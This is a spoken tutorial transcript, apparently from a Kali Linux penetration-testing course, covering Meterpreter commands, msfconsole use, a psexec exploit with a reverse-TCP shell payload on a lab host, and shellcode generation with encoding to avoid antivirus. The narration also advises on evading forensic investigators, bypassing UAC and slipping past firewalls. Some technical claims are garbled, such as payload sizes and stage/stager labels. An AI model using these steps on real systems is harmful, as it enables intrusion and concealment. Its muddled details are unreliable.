creating hidden processes. -A for would be the arguments to pass to the executable using the execute command, and -C to channelize the input and output. And I can kill multiple things at one point of time, such as, let's say, for example, if I wanted to kill let me check if something is not necessary. So everything is necessary, I believe, over here. So I'll just go ahead and open, let's say, a media player, and I want to kill the process. Let's say I'll also go ahead and open Chrome. Okay, yep. So I'll just go over here. So let's say I wanted to go ahead and kill these processes, so multiple processes at one point of time. So as you can see, I have the Chrome over here with 3504 and WM player with 2932. So I can just go ahead and type kill 3504 and 2932. It will go ahead and kill all the processes. And if I go and check PS, as you can see, 3932 was deleted, but let me check, just 3932, 2932 and 3504. So 3504 was killed, but Chrome once is still running, so I'll just go ahead and delete that as well. I'll just go ahead and copy it, and I'll go ahead and kill that as well. 3296 not valid. Okay, let me check. Okay, bad command. Okay, we have Chrome up and running, but the media player has stopped. So let me check. 292696. I'll just check. Okay, I believe the Chrome should have stopped by now. It's still running. Okay, we have another process. Chrome eats up a lot of RAM. Let's see. Okay, perfect. It's disabled now. So this is how we can go ahead and kill multiple processes as well. If you want to execute any command, then you can go ahead and type execute, that's execute -f cmd-c, and we'll go ahead and execute that specific command. Let me check if, as you can see, I have the command over here prompt. If I had written something over here, then it would go ahead and straight away run that prompt. Perfect. So execute does actually goes ahead and runs any kind of process. If I wanted, I can also go ahead and switch to interactive console. So I can just go ahead and type interact 1, and it will go ahead and interact with channel 1. And similarly, I can do multiple things like that. And the person over here will not even be able to understand exactly what is actually happening. So then we have echo interpreter interactive channel in the action, which I could actually go ahead and execute through the command. And Finally, I can go ahead and you can go ahead and check all the help options over here, which will help you understand the importance as to what exactly all things what we can do, and if the person was running on proxy, what are the proxy configuration, and multiple things. So that's it for this tutorial. And before I end this thing, I'll just like to tell you that you can go ahead and type Control C to go ahead and get back to where you were exactly. And I'll just go and close this over here. So a few things before I close this tutorial is that a number of other extensions exist that provide potentially useful commands. The entire extension system is easy and to modify and customize, thus allowing for more advanced extensions to be written in the future. And the extensions that would be included would be FS, that would provide interaction with the file system on the remote machine. Next one is net, that provides interaction with the network stack on the remote machine. Process, that provides interaction with processes on remote machine. And finally we have sys, that provides interaction with the environment on the remote machine. So yes, that's all with that's only with how as far as we can go with the meterpreter prompt. So that's it for this tutorial, guys. In the next tutorial, I will be starting with metasploit and how exactly metasploits are different from the meterpreter and how flexible they are. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, we saw how we could actually go ahead and use the meterpreter to our use, and it was also included and embedded in with the metasploit as well. So in this tutorial, I'll be teaching you in deep about the metasploit. So I'll just go ahead and start the MSF console to start with. And I'll go ahead and delete the previous payload that I created. Can take a bit of time to start. So this is how the MSF console looks like, an image of a cow. And yes, but we won't be, I just opened this because if I won't be teaching you the MSF console through this prompt. So I will be teaching you in something different. But if you're wondering that why I actually opened this specific console, the reason for that is because if I open something else, then you might be wondering, and if you already have a bit of information about MSF console, then you might be thinking that MSF console is this thing and I'm teaching you something else. No, I'm teaching you what exactly MSF console is and how we could actually use that in depth. So that's the reason I wanted to teach you that this is how we can go ahead and access the MSF console. But there would be a more powerful command line interface to go ahead and access this framework, and that would be through MSF CLI. So I'll just go ahead and type MSF CLI. That is, okay, it's deprecated, I believe. So I'll just go ahead and use the MSF console itself. Perfect, never mind. So note that when you're using MSF console, variables are assigned using the equal to operator and that all options are case sensitive. So you need to make sure that whatever you're actually trying to execute makes sense or it is already there in the system, because it works through Ruby command line. That's why. So if you do have to, if you need help or even if you have a single spelling mistake, then it won't work. But you can still use the tab completion method to go ahead and complete your statements so that you could execute them in a proper way. So to start with, let's just start. So, okay, perfect. So you can just go ahead and type exploit and it will show you. Okay, so I'll just go ahead and type MSF console and I can just type exploit. I believe this was removed Xville. Exploit slash multi. Well, let me just check if I could go ahead and install, and I can just type exploit slash multi slash Samba. And Samba is for our own Linux distribution, and you can type, since I don't have any Linux, I won't be executing this now because I have only a Windows distribution over here, which I could actually go ahead and hack. So, and I can just type script. So MSF console provides a powerful command line interface to the framework, and it allows us to easily add Metasploit exploits into any scripts that we may create. So I will use the equal to operator, and it would be my R host. So I'll just go ahead and select something random, since I would not be actually accessing thing. And then I'll have to use the payload and make sure that it's case sensitive. So you type in the proper thing and cmd slash unix slash reverse, and lhost equals to 172.16.193.63 space e. Perfect. So if you are not entirely sure about what options belong to the particular module, you can append the letter O in the end over here, right, exactly, so that it will exactly guess what you're actually trying to say. And it's own auto zero, just make sure that you enter the proper thing. So to display the available payloads for the current module, append letter P in the end instead of O, and you will exactly see all the available modules. So the benefits of MS Console interface would be that it supports launching of exploits and auxiliary modules. It is useful for specific tasks, good for learning, convenient to use when testing or developing a new exploit. It's even a good tool for off exploitation or one-off exploitation. It's very excellent if you know exactly which exploits and options you need, and it's very wonderful for the use in scripts and basic automation. But the only real drawback is that it is not supported quite as well, and it can only handle one shell at a time, making it rather impractical for client-side attacks, and it doesn't support any of the advanced automation features of the MSF console. That's why we don't use the MSF CLI as of now. So now I'll be coming back to the most important part, that is the MSF console that we have over here. So MSF console is probably the most popular interface to the Metasploit framework. So before I proceed, I'll just type MSF console that we saw over here previously, which has replaced the MSF CLI. Let's see what happens. Okay, so these things have been missing. So let's check X and what happens. Perfect. So as you can see, the MSF CLI has been deprecated and it was removed permanently. So we cannot go ahead and use that any further. We'll only have to use or work with the MSF console, and we would actually won't need the MSF CLI. So the MSF console is probably the most popular interface to the Metasploit framework. It provides an all-in-one centralized console and allows you to efficiently access to virtually all of the options available in the MSF. MSF console may seem intimidating at first, but once you learn the syntax of the command, you will learn to appreciate the power of utilizing this interface. So benefits of using MSF console is that it is the only supported way to access most features within Metasploit. So it provides a console-based interface to the framework. It contains most features and is the most stable MSF interface. It supports full line reading, tabbing, and command completion. Execution of external commands is also possible in MSF console. Let me show you something. Let me check if I have my net access over here, if I have the NAT perfectly. I believe so. Okay, so I have my net active. So I'll just go ahead and check ping www.google. Oh no, I don't even need www.google.com. Let's see if we get something. Perfect. I'll just type Control Z and I'll just go back to the MSF console. Perfect. So as you can see, I can still go ahead and use the external commands inside the MSF console. And the MSF console is launched by simply running the MSF console from the command line as I showed you. And it is located in the user share Metasploit framework MSF console directory. You can pass -h to MSF console to see the other usages or usage options available to you. So while the time this starts, I'll go ahead and show you how exactly it looks like. I hope it should not go ahead and start the MSF console again. Perfect. So as you can see, we have different environment options, migration, no database, YAML path, and file, and lots of other things. So you can also go ahead and specify a directory containing additional database migration by typing the -e, or you can specify the database environment to load the YAML environment by typing -v and something more. So, sorry, -v is for the version show. So in this way, you can go ahead and access different kinds of things with the Metasploit MSF console terminal. The MSF console is designed to be fast and to use, and one of the features that helps this goal is tab completion. With the wide array of modules available, it can be difficult to remember the exact name and path of the particular module you wish to make sure use of. So as with the most other shells, entering what you know and then pressing tab will present you with a list of options available, whether you know it or not, and it will autocomplete the string if there's only one option. So tab completion depends on the Ruby readline extension, that's RRL, and it nearly every command in the console supports tab completion. So I'll show you one example. You can just type use exploit, and as you can see, I just typed, if I can just type X and I can just hit tab, then there's only one thing that starts with EX, that's exploit. I can type W and it will select Windows because that is the only one. And I can select D, then you will see we have DCE or something like that. So I'll just hit enter. I don't know whether DCE is still there. Okay, I believe we have a 0, so I'll just hit enter. Okay. Okay, so we have all of these MSF0. Let's go ahead and select the DCOM module. So I'll just type _02 MSF03. Okay, I messed up a bit. Perfect. I'll hit enter. Perfect. So I'll just go ahead and type use net API. Let's see if that works. I probably think it won't because I already selected this specific term. Yep, it won't work probably. Yep. So I'll just go ahead and go back and I'll type use net and I'll hit tab. Okay, I believe use net API won't work. Let's see. I believe it should be period asterisk net API. Yep. Yep, it won't work. Perfect. So, and then we can go ahead and you set the set lhost. So let's check if cannot log level. So I'll just go ahead and type lhost. So it won't work because it does not have the lhost as of now. Then we can go ahead and set the target, set the payload, and different other things. We can also go ahead and use the SMB method. So I'll just type use exploit / Windows / SMB. Okay, I believe. Okay. So I'll just type use SMB / MS. Let's see if that works. So we have all of these things and we'll be selecting this one 03. Perfect. Net API. Perfect. So the MSF console is most commonly used interface in Metasploit, and making yourself familiar with this MSF console command will give you throughout this course and give you a strong foundation for working in Metasploit in general. So that is it for this tutorial. In the next tutorial, I'll be teaching you more about the MSF console core commands and how we can go ahead and work with them. Hey guys, and welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in this tutorial, we will be taking a deep look in Metasploit. So in the previous tutorials, I taught you exactly what Metapredator are and how Metasploit works, and why MSF CLI was deprecated and MSF console was used instead for each and every other thing. So MSF console is most commonly used interface in Metasploit. Just to give you a brief introduction about my previous tutorial, and it has a very strong foundation for working with Metasploit in general. So let's start with the MSF console core commands and let's gather what information that we can get. So the first thing that I would like to teach you would be the back command, so that in case you are stuck anywhere, then you can, and if you want to go back, you can just type the back and it will take you back exactly where you were. So once you have finished working in the particular module, or if you selected the wrong module by mistake, you can issue the back command to move out of the current context. This, however, is not required. Just as you can in commercial routers, you can switch modules from within the other modules. As a reminder, variables will only carry over if they are set gradually. And after that, we have the check command. So there are not many exploits that support it, but there is also a check option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it. So I cannot go and run that right now because I have not yet executed any kind of payload, but we'll see that later on. After that, we have the color option. So you can enable or disable if the output you can get through the MSF console, which will contain color. So I'll just type color and let's say color. Let me just check if I have never actually used it. Let's see, color true. Okay. Let me check. Okay. I'll just go ahead and select it to false. And what is the other thing? Auto. Perfect. I'll set it to auto. So you can enable and disable this through the output through the MSF console that contains color. So after that we have the connect, and connect is a miniature netcat clone which is built into the MSF console. It supports SSL, proxies, pivoting, file sendings, and etc. So by issuing the connect command with an IP address and port number, you can connect to a remote host from within MSF console, the same as you would with the netcat or telnet. So I can just go ahead and type connect, and I can type this computer's IP address. Let me check exactly what it was. Okay, I need to run it as administrator, I believe. Okay, 192.168.236.131. So I'll just write 192.168.236. It was 131, I believe, right? Perfect, 131. So, yeah. So I need to go and specify the source port and the source address. I have already provided that. So I can just type -s. This is the source address. Port would be -p443. And okay, specify a host and port. I should be able to connect it without even specifying this. Let me check. Okay, perfect. This is how it works. So I'll just go ahead and cancel this because I don't want to actually go ahead and connect it to that machine, but this is how it looks like. You can see all the additional options by typing connect-h. After that, we have the edit command. The edit command will edit the current module with visual or a text editor, and by default this will be open in the current module, that is vim. After that, we have the MSF exploits, and the exit command, it will simply exit the MSF console. So the info command will provide detailed information about a particular module, including all options, targets, and other information. Be sure to read always the module description prior using it, as it may have undesired side effects as well. The info command also provides the information such as the author and licensing information, vulnerability references such as CVE or BID, etc. Any payload restrictions the module may have, such as, I'll just go ahead and show you info, and I can just type exploit Windows SMB / and let's say MS09 function index. Perfect. I'll hit enter. As you can see, these are the references, and it will give you the detailed information about your exploit. Okay, where did it go? Perfect. So these are the references. Okay, where did I? Okay, perfect. So this is a negotiate process ID function table. It's good. It was disclosed in 2009. That means it's quite old, but still Windows is not anywhere new, so it will straight away go ahead and work. It will work in Vista, Service Pack 1 and Service Pack 2. That means it will also work in Windows 7. Here are the R host, R port, and these are the ports. So you can just go ahead and check that into detail. So after that, we have the IRB. So running the IRB command will drop you into a live Ruby interpreter shell where you can issue commands and create Metasploit scripts on the fly. This feature is very useful for understanding the internals of the framework. So you can just go and type IRB and it will open the interactive Ruby shell. I can just type Control-C. Let me check back. Okay. Okay. Perfect. Perfect. After that, we have the jobs module. So jobs are modules that are running in the background. The jobs command provides the ability to list and terminate jobs. So you can get more information by typing jobs-h. So we have the kill command, which I taught you previously, and the kill command will kill any jobs when supplied with the job ID, that is kill 1234, and 1234 is the job ID. After that, we have the load command. That the load command loads a plugin from Metasploit's plugin directory. Arguments are passed as key equals to value on the shell. And let's say, for example, let the Metasploit start and I'll show you. I can go and load the pcap log if I have. So let me check if I have my previous session's pcap log available. Okay, so I'll just go ahead and type load pcap block. Perfect, and I'll hit enter. Let's see what we get. As you can see, I have successfully loaded the plugin by using the load command. After that, we have the load path. So the load path command will load a third part module tree for the path, so you can point Metasploit to your zero-day exploits, encoders or payloads. So I can just type load path, and I can just type, let's say, slash home, and I can slash secret, or I can slash anything modules, something like that, where these is my final folder and these are the location where it is exactly. As of now, I don't have anything, so I won't be loading any specific path. After that, I also have the unload module, and conveniently the unload command unloads a previously loaded plugin and removes any extended command. So I'll just type unload pcap log. Perfect. After that, we have the resource command. The resource command runs resource files that can be loaded through MSF console. Some attacks such as Metasploit, they use resource files to run a set of commands in karma.rc file to create an attack. Later on, I will discuss how exactly outside of Karmasploit that can be useful, but I won't be actually running that. So I'll just go ahead and show you exactly resource karma. I believe that was again removed. Yep, karma was removed. So it was very buggy actually previous since a long time. So I believe they have removed that. Then we have the batch files, and batch files can greatly speed up testing and development times, as well as allow the user to automate many different tasks. Besides loading a batch file from within MSF console, they can also be parsed at startup using the -r flag. The simple example creates a batch file to display the Metasploit version at startup. So you can just type over here something like echo version, and you can just type version period rc. Yes, so now I don't have the rc module loaded, but you can just go ahead and type that, or you can also type msf console -r version period rc. So through this you can go and see the version of the MSF console that you are using. After that, we have the route command. The route command in Metasploit allows you to route sockets through a session or COM, providing basic pivoting capabilities. To add a route, you pass the target subnet and the network mask followed by the session number. That's let's say, for example, you can just go and type route-h, and it will give you the details about whether to add, remove, get, flush, or print the subnet mask and the communicator SID. After that, we have the search command. So search can go and search specific modules. Let's, for example, I will use search UAC, that's user account control. So it will search all the payloads related with the user account control of Windows, that's UAC. So you can use these commands to go and bypass the user account control. Let's say if you want to run some scripts with, that need administrator access, then you can go ahead and first bypass the UAC command, and then you can go ahead and access that. So in this way you can go ahead and do that. So search includes an extensive regular expression based search functionality. So if you have a general idea on what you're looking for, you can search it via the search option. And as you can see, we have these, and this is the best one that I would normally use. And though it is not the latest one, but it is the most used exploit, because you can always go ahead and pass the user account control. So the search function will locate this string within the module names, descriptions, references, wherever it gets. So note that naming convention for Metasploit modules uses underscores versus hyphens. So if you go and type by mistake any kind of let's say a hyphen instead of underscore, it will not work. So let's say I'll just go ahead and type search, and I'll just type, let's say, user map. Okay, user map. So you don't need to go ahead and type anything like a user map script, because it won't work. You need to use the underscore only, then it will work. So you can further define your searches by using the built-in keyword system. That is, you can just type help search, and it will help you in different ways as to how we can go ahead and say search specific things. And to search using a descriptive name, you can simply use the name keyword, and you can just type such as, if you want to search something in the name, you can type search name, and you can type MySQL, and it will go ahead and search anything and everything related to MySQL. So let it end. Perfect. These are all the exploits related with the MySQL command. So that's how it looks like, and that would be it for this tutorial. In the next tutorial, I'll be starting with the payloads and exploits, and that's it for the Metapreter prompt. There are multiple other commands related in the Metasploit, but I don't think that are as much necessary as these things, so I only taught the important parts. So, but still, you can go down, check later on, and you can gather this information by searching the help command in the MSF console. So that's it for this tutorial. Next tutorial will be starting with the exploit and payloads chapter.
Hey guys, and welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux, the advanced distribution. So in this tutorial, we will be taking an in-depth look into exploits and payloads. So let's go ahead and fire up our Kali Linux. So I'll just start my VMware. Okay. So all exploits in a Metasploit framework will fall into two different categories. One is active and another one is passive. So active exploits will exploit a specific host. It will run until its completion and then it will straight away exit. So today we will be looking on to two in-depth types of things, that would be payloads and exploits. And after that I will be giving you some good database description related to Metasploit. So let's have a look at that. Okay, so yeah, before I proceed, there are brute force modules that will exit when a shell opens from the victim, and module execution stops if an error is encountered. So you can force an active module to the background by passing -j to the exploit command, such as exploit-j. So I'll just go ahead and you can just go ahead and type exploit-j and you can go ahead and use that exploit. Or if you're in MSF console, let me just go ahead and open the MSF console. I will be using the Windows SMB psexec exploit, and I'll be showing you how exactly these two differ. That's active and passive exploits. By the time it starts, I'll just go ahead and also start another terminal. So now over here I'll be using the SMB psexec exploit. So I'll just go ahead and type use exploit, and I'll go ahead and use it for Windows SMB slash p, let me check, psexec exploit, and I'll hit enter. So it has accepted the psexec. I'll just go ahead and type set our host to my remote computer. That would be 192.168.236.130. This is my own IP address which I have received from over here. So yep, and I'll just go ahead and hit enter. After that I'll just go ahead and type, as you can see we have the R host set up over here. After that I'll go ahead and set the payload option, and I'll go ahead and I'll just go ahead and use the Windows one, Windows /shell/ and I'll use the reverse TCP, and I'll hit enter. So payload is also set up right now. That's the Windows shell reverse TCP. After that, now I will go ahead and select the local host. So I'll just go ahead and type set lhost, and I'll just go ahead and start up my Windows 7 as well. This is not actually a good idea, because most of the time if your firewall is open, even if the normal Windows Defender is open, it will not allow you to go ahead and exploit that particular system. So most of the time an active exploit is far better than just a passive exploit. But still there are sometimes people using Windows XP in many of the organizations, and that's the reason I am teaching you that. And Windows XP is extremely vulnerable to this specific exploit. So I'll just go ahead and open my command prompt. Okay, so my IP address is 192.168.236.131. So I'll just type, and I'll just go ahead and set it to 1. Perfect. Now I'll hit enter. So I have the remote host setup, the payload, and the local host setup. Next thing I need to do is to go ahead and set the local port. So just type select L port to, let's say, for 4444 for example. You can choose anything, it's not anything like SN specific. And I'll be using the SMB user, so I'll just go ahead and select set SMB. Okay, so we have SMB, so I'll be using select SMB user, and I'll just go ahead and type victim. Okay, perfect. Set SMB user, and I'll go ahead and type I want to go ahead and select it to be the victim, so I'll just go ahead and type victim. Let me check. Okay, sorry, SMB user. Okay, so SMB user is the victim right now. So now I'll go ahead and select the S3CR3T exploit. So I'll just go ahead and select the same thing again, but over here I'll select S3CR3T. So that is secret, so it doesn't matter if I had a different one. So I'll just go ahead and I'll do one thing. I'll just go ahead and use my own one, the one which I'm using right now. It's test user, so I'll just select test user, and I'll go ahead and select the password as SMB pass, and my password is abc@123. And just remember that this password that I have used is extremely insecure. I have just used it for testing purposes, so I have used it. Now I'll just go ahead and type exploit. Okay, so as you can see, it tried to go ahead and connect to my remote server, but the connection refused. Okay, let me check if my connection is still active. Ping 192.68.236.131. Okay, the connection is active, so I'll just go ahead and try to exploit that once more. Test user abcd@123 exploit. Okay, so the reason for this is just ignore the part that it's giving over here that connection is refused. So what passive exploits does is that it waits for incoming host and then exploit them. So it won't work normally. What you need to do is that you need to make sure that the person over here is actually trying to go and access something from your system, and only when he does that kind of thing you will be able to access that. So passive exploits are always focused on clients such as web browsers, FTP clients, etc., because they need something to redirect something to them. They can also be used in conjunction with email exploits waiting for connections. And passive exploits report shells as they happen, as they can be enumerated by passing the -L to the sessions command. Passing -I will interact with the shell. So selecting an exploit in Metasploit adds exploit and check commands to the MSF console. So I'll just go back and I can just type, let's say, use exploit, and I can just type Windows SMB / and I'll just type MS09, and yep, perfect, and I'll hit enter. And inside over here I'll just go ahead and use exploit. Okay, sorry, I'll just go ahead and use the help. So as you can see over here, I'll just okay, and stop. So as you can see it over here, we have the different check option to go ahead and check if the target is vulnerable. So before I go ahead and proceed with that, I need to know whether what I'm doing will work. So after this, I'll just go ahead and type show. Let's see what happens. Okay, I believe the show should be in. Perfect. So this is what it does exactly. It's showing me now what will happen, and okay, perfect. So it's what is exactly is gathering all the information that that specific exploit can do, and it's showing me all of these things. So using an exploit also adds more options to the show command. So I can also type, let's say, like MSF exploit show targets, and it will also go ahead and show me targets if there are any. Okay, I believe show targets have, okay, let me check. Perfect, it should be lowercase l. So this exploit will work towards Windows Vista Service Pack 1, Service Pack 2, and the Server 2008. So now I need to go ahead and check whether there are any payloads related to that. So I can go ahead and type show payloads and hit enter. And these are the payloads that are available for this kind of exploit, and these are showing exactly which one is encrypted, which one is not, and which one is the best used for our purposes. So after that, now we can go and also use the show advanced commands or show options and show evasion. So I'll just go ahead and type show options. It will show exactly what all I have set. If I have set something to the R port, it will go ahead and select that, else it will go ahead and select the default 445, and the R host would be my remote computer's address. So when I go ahead and set any of these things, it will show me that. So I'll just go ahead and show you that set R host 192. Okay, perfect. So let's see if what I get if I show options. Perfect. So the remote host is set. Now I'll just go ahead and use set R port, and I'll just type, let's say 44. No, I'll just use 44, and I'll go ahead and type show options. And as you can see, the R port has been changed. And there is one more method I can go ahead and type, that's show options, or not show options, it's show advanced. And it will show me that how exactly will it work, what will be the verbose, and how many workspace will this module acquire to go and actually get the required number of port connections. So these are all the types of things that this can be done and this can be worked through. And the last thing would be to go and show evasion. That will show you exactly how what are the ways through which it can go ahead and evade some of the things, so that person who is actually trying to, or the forensic investigator who is actually trying to gather information, he will not be able to gather any kind of thing. So yeah, that's it, and that is it for the exploits part. It's not much in detail, and exploits, there's not much to learn about exploits as well, because it's very easy to understand. So that's it for this tutorial, but I'll be continuing with the payloads stuff in the next tutorial, and just hang on for that. Hey guys, and welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in today's tutorial, we will be learning about payloads. In the previous tutorial, I have taught you about Metasploit, Meterpreter, and the exploits. So if you have not gone through that, then I would recommend you going through all of those tutorials, because else you will not understand what exactly payload is. So a payload in Metasploit refers to an exploit module. So there are different types of payload modules in Metasploit framework, such as singles, stagers, and stages. These different types allow for a great deal of versatility, and it can be useful across numerous types of scenarios. Whether or not a payload is stage, it is represented by / in the payload name. So for example, let me just show you. I'll just go ahead and open the MSF console. And while the time it opens, I'll show you how exactly a payload would look like. So if I wanted a Windows, let's say bind TCP payload, then I'll just go and use Windows/bind_TCP, something like that. It's a single payload with no stage, whereas Windows consists of a stager and a stage. So it might be a bit confusing to understand. So bind TCP is the stager, and if you want to go ahead and check the stage, then I can just go ahead and type shell_bind TCP. So shell over here is the stage, whereas bind TCP is the stager. So three things that I would be covering today in detail will be the singles, the stagers, and the stages. So we have our MSF console open. So singles are payloads that are self-contained, and they're completely standalone. A single payload can be used, or it can be something as simple as a user, or adding a user to the target system, or running a calculator.exe file. After that, we have stagers, and stagers set up a network connection between the attacker and the victim, and are designed to be small and reliable. It is difficult to always do both of these well. So the result is multiple similar stagers. Metasploit will use the best one when it can, and fall back to a less preferred one when it's not necessary, or when it's necessary. So Windows NX or NT version versus the no NX stager, they contain nothing. Reliability issues for the NX CPUs and DEP NX stagers are bigger. It's a virtual allocation. And default for now is NX plus Windows 7 compatible, so you don't need to worry about that. After that, we have stages. So stages are payload components that are downloaded by stagers modules. The various payload stages provide advanced features with no size limit, such as meterpreter, or let's say VNC injection, or even the iPhone iPon shell. Payload stages automatically use middle stages. A single receive fail with large payloads. The single stager receives, or you can say as single receive fails with large payloads. The stager receives the middle stager, and the middle stager then performs a full download, and it will go ahead and read, write, and can perform any kind of those tasks. So, expanding on payload types in Metasploits. So, I have briefly covered three main types, that is singles, stagers, and stages. Metasploit contains many different types of payloads, each serving a unique role within the framework. So let's take a brief look at the various types of payloads available and get an idea of when each type should be used exactly. So let's start with the non-staged inline module. A single payload containing the exploit and full shell code for the selected task. Inline payloads are by design, you can say as it's by design more stable than their counterparts because they contain everything all in one. So however, some exploits will not support the resulting size of these payloads, but still some will. So these are how the inline non-staged look like. After that, we have the stager payloads, which work in conjunction with the stage payloads in order to perform a specific task. A stager establishes a communication channel between the attacker and the victim and reads in a stage payload to execute on the remote host meterpreter. And meterpreter is the short form of meta interpreter, which is an advanced multifaceted payload that operates via DLL injection. The meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it exceptionally difficult to detect with conventional forensic techniques. Scripts and plugins can be loaded and unloaded dynamically as required, and meterpreter development is very strong and constantly evolving. So whenever you go ahead and try to run some kind of payload on your system and you execute a meterpreter into their shell, you don't need to worry about, because normally no one will actually be able to gather any kind of information whether you actually went ahead and gathered any kind of information or you actually hacked into that, because there are no traces left on the hard drive. It only works on the memory or the virtual memory, and you don't even need to worry about the RAM, cleaning the RAM, because it's not that hard after all. But still, there are chances that some people may try to find you out if they are checking that. But still, if they're checking what are the things that are actually consuming RAM. But still, that's again a totally different story, because payload or the meterpreter does not eat any kind of resources. It's a simple PowerShell or a command prompt kind of thing, which will hardly use like a few kilobytes. So you don't need to worry about any of these things, because normally any kind of application, if that's running, it will take probably a few MB, like 6-7 MB, or up to more than even 100 MB. So you don't need to, so people will not actually go ahead and be able to understand it until and unless the person is actually far smart. After that, we have the PassiveX payload. PassiveX is a payload that can help in circumventing restrictive outbound firewalls. It does this by using the ActiveX control to create a hidden instance of the Internet Explorer, and using the new ActiveX control, it will communicate with the attacker via HTTP request and responses. So I'll just go ahead and explain this to you in detail. Let's say, for example, you have a firewall inbuilt, but somehow the person has gotten into your computer, but after he has sent you the exploit successfully passed on through your computer, but it is not able to go ahead and reach out, or it is not able to create a backend connection through the meterpreter to our own Kali Linux. So what the PassiveX will do is that it will create a fake Internet Explorer type of, let's say, networking prompt. And I'll just show you how exactly looks like. I'll just go ahead in the task manager. And I'll just go to the process. Okay, it won't take me. Okay, so this is how it will look like. So the firewall will probably think that it'll probably think that, okay, it's not a big deal because Internet Explorer is trying to gain access. So it will look something like it's actually something from the Internet Explorer that is trying to gain access, and the firewall will actually allow it. The reason being that it's going from inside to outside and not actually going to some random connection from some random application. So that's how strong it is. So after that, we have the NoNX module. So the NoNX is a short form for no execute bit, and it is a feature built into some CPUs to prevent code from executing into certain areas of memories. In Windows, NX is implemented as DEP, that is Data Execution Prevention, and the Metasploit NoNX payloads are designed to circumvent the DEP. So it's not a big deal to go ahead and bypass that as well. After NoNX, now you know what NoNX is. We have the ORD, that's ordinal payloads, and ordinal payloads are Windows stager. They are they're Windows stager based payloads which have distinct advantages and disadvantages. The advantages being such as it works on every flavor and language of Windows, such as XP, Windows NT, Windows 98, Windows 2000. It doesn't matter which unless it is Windows and it works on DOS. And without the explicit definition of a return address. They are extremely very tiny. However, two very specific disadvantages of ordinal payloads make them not the difficult choice. The first thing that it relies on is the fact that WS2_32 period DLL is loaded into the process and it is being exploited before exploitation, which is not exactly happens every time. And the second thing being that it's a bit less stable than the other stages. So that's quite not a good thing for us hackers to go ahead and execute those kind of payload. But it works in every kind of thing in all types of Windows. So unless you have these two things running, it won't matter. So after that, we have the IPv6 payloads, and the Metasploit IPv6 payloads, as the name indicates, are built into the function over IPv6 networks. So not much to know about all of these things, but these are the basics that you should know before going ahead and actually start using the payloads, because they can be quite harmful not only to the person whom you're trying to attack, but can be you, even if you're trying to go ahead and do some kind of mischief as well. So that would be it for this tutorial. In the next tutorial, I'll be continuing with the reflective DLL injection and generating a payload for Metasploit. Welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, I taught you about the different types of payloads, but I mentioned one thing, that there is one more thing, that is a reflective DLL injection. So reflective DLL injection is a technique whereby a stage payload is injected into a compromised host process and it is running in memory. It's never touching the host hard drive. The VNC and the Metapeter payloads, they both make use of the reflective DLL injection. We can read more about them from Stephen Fever, that is the creator of reflective DLL injection method. So I won't be getting much into that in deep, because I now have to go ahead and start as to how we are going to actually generate a payload for Metasploit. So now that we have an understanding of what payload is, payload types, and when to use them and how to use them, let's generate some payloads. So generating a payload is not that difficult in Metasploit unless you know exactly what you're doing. So during exploit development, you will most certainly need to generate shellcode to use in your exploit. In Metasploit, payloads can be generated from within the MSF console. So when you use a certain payload, Metasploit adds the generate, pry, and reload commands. Generate will be the primary focus of this section in learning how to use Metasploit. So we'll just go ahead and use the payload. So I'll just get back into my Kali. Let's type use, and I'll just type the payload, and I'll use the Windows one. So I'll just type Windows, and I'll be using the shell bind TCP that I showed you previously. And just make sure that this bind option is this is the underscore, and there are no hyphens over here. I'll hit enter. It has selected the Windows shell bind TCP, where shell over here is the stage, whereas the bind TCP is the stage. Oh, sorry. The bind TCP is the stage, whereas the shell is the stager. So now over here, I'll just go ahead and type help to see what all things we have. So you can see I can go ahead and use these commands to communicate with the host. Yep, connect and all of these things. We have these database backend commands such as credentials, which I will be teaching you in the next tutorial. And finally, we have the payload command to check, generate, pry, and reload. So now I would be going ahead and using the generate one. So I'll just, since we need to generate a payload, so I'll just type generate space -h. So to generate shellcode without any options, simply execute the generate command. But over here, I'm actually trying to show you exactly how we could actually generate a payload with some other understanding. So it would be forced encoding to go ahead and hide it from the antivirus or the AV. We have the list of characters to avoid so that the antivirus does not go ahead and detect us. Name of the encoder module, the output file, and if I just go ahead and type generate, it will just generate a simple without unencoded payload. So I'll just type generate, and as you can see, this is how the payload looks like. You may or you may not be able to understand exactly how it is because this is just the script to go ahead and avoid or get, you can say as get false permission from Windows to go ahead and access something from them. The real thing starts over from here, over here. That's how it looks like. So after that, of course, the odds of generating shellcode like this without any sort of tweaking are rather low. More often than not, bad characters and specific types of encoders will be depending upon the targeted machine. So this sample payload over here, it contains an almost universal bad character, that is the null byte, which is /x00. So if you look properly into this, you will surely go ahead and find this /x00, these stuff, and that's how the antivirus goes ahead and finds the actual culprit, that is our virus or the Trojan or whatever you want to call. Over here, I'll be calling it payload. So granted, some exploits may use or it may allow them to use it, but not many. Let's generate the same shellcode. Only this time we will instruct the metasploit to remove this unwanted byte. So to accomplish this, I will issue the generate command followed by the B switch with accompanying bytes we wish to be disallowed during the generation process. So as you can see, I have this specific term over here which I will be using B to go ahead and avoid the list of characters. So I'll just type generate -B space and I'll type in inverted commas /x00 and I'll hit enter. So as you can see, this time there is no /x00 and it's quite a good encoded payload. Whereas the last time you can see after the 82 we have /x00, whereas over here we don't have that. You can go ahead and search the whole file, you won't even find anything over there. So looking at this shellcode, it's easy to see compared to the previously generated bind shell. The null bytes have been successfully removed, thus giving us a null byte free payload. So we also see other significant differences as well due to the change we enforced during generation. One difference is the shellcode's total byte size. In our previous iteration, the size was 341 bytes. This new shellcode, however, is 27 bytes. So that's quite much of a difference that created with the help of null bytes payload. So I'll just go ahead and generate this. And this is normal one with the 341 bytes, and if I go and type this is the normal one with our 27 bytes. So it's quite good. So so during the generation null bytes original intent or usefulness in code, it needed to be replaced or encoded in order to ensure once in memory our bind shell remains functional and it is not thrown out by the antivirus. Another significant change is added to the use of encoder. By default, Metasploit will select the best encoder to accomplish the task in hand. The encoder is responsible for removing unwanted characters, amongst other things, entered when it was used with the -B switch like I used. I'll discuss the encoders in great detail later on. So while specifying bad characters, the framework will use the best encoder for the job. And the best over here is the into 32-bit, that's x86/ Shikata Ganai. That, and you might be wondering that if I have heard about that before. Now I'll show you 